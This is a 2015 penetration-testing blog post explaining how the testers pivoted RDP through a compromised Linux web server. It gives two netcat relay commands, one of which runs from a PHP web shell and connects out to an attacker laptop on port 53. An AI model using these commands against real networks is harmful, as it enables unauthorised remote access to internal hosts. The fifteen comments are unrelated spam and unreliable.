A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end so needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunaely the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 then relays that connection via anther netcat instance to a local listener on RDP port 3389:

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command:

nc hacker-laptop -p 53 -e nc windows-server -p 3389

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Again, proof that netcat rocks!


  1. Infosec rantings have a blog about pivoting RDP with netcat. They have a shell with back-end Windows systems including credentials. You can hire dissertation writers to solve your educational problems easily. You can also install the system with the port of 53. Join in for more.

  2. Hmm, I am thinking about getting an admission in the networking degree program. I have outsourced my personal statement to personal statement writing service - Dissertationproposal.co.uk and I guess, I will receive it soon. Anyway, I guess this post will come in handy as it looks like some networking related post. I am saving it for the future and will return to it when needed.

  3. This network is very profitable, and many people have joined this and they are getting a lot of money. If you are jobless, you should join this field and enjoy earning money. Many professionals are satisfied because they have secured their future. I hope, many people will follow these guidelines and get benefits. Assignment writing help.

  4. I love programming languages. They attract me to learn more about them. Currently, I am taking assignment writing services for a programming assignment, and trust me, I have to pay a lot for it. I used to think that these services will be cheap but no, they are quite expensive and at times can be hard to pay as well. Though, my writer is lenient and helps me out when I cannot pay him.

  5. I am a computer science student doing A-levels right now. I had been given assignments related to programming languages for which I am taking professional academic writing help from a top academic writing agency. This has helped me understand programming languages that were not familiar to me before and were related to my coursework.

  6. Hello We Are Academic Help Adviser Please Visit Our Site. Thanks

    law dissertation help

  7. Your post is very helpful and information is reliable. I am satisfied with your post. Thank you so much for sharing this wonderful post.
    Dissertation Writing Services

  8. RightJackets is the best place for you to get the most original custom made products and more.We have the biggest range of a variety of products.
    Richardson X Pornhub Jacket

  9. RockStar Jackets is incredibly pleased to announce ourselves as the most dependable manufacturers and exporters of a variety of products comprising of Leather Garments
    Chris Martin Higher Power Jacket

  10. HARDCORE CYCLES was started in the Greater Philadelphia area by a group of tight friends with a passion for V-Twin performance aftermarket parts.Visit our Website Thanks

    LA Choppers T-Bar Handlebar Adapter for Road Glide

  11. Hellow! Im Jacket Seller Custom Deign Leather Jackets Please Visit My Site Enjoy Thanks.

    Squid Game Frontman Jacket

  12. No doubt this is an excellent post I got a lot of knowledge after reading good luck. EssaysnAssignments Provide Dissertation Help Online.

  13. I will always let you and your words become part of my day because you never know how much you make my day happier and more complete. There are even times when I feel so down but I will feel better right after checking UblUldU your blogs. You have made me feel so good about myself all the time and please know that I do appreciate everything that you have.buy latest gadget online

  14. Old Mill Saddlery is a leading equestrian retailer based in the United Kingdom. The strengths of our business comes from our core values. old mill saddlery

  15. This is the first time that I visit here. I found so many exciting matters in this particular blog
    Site : Mindfulness Kit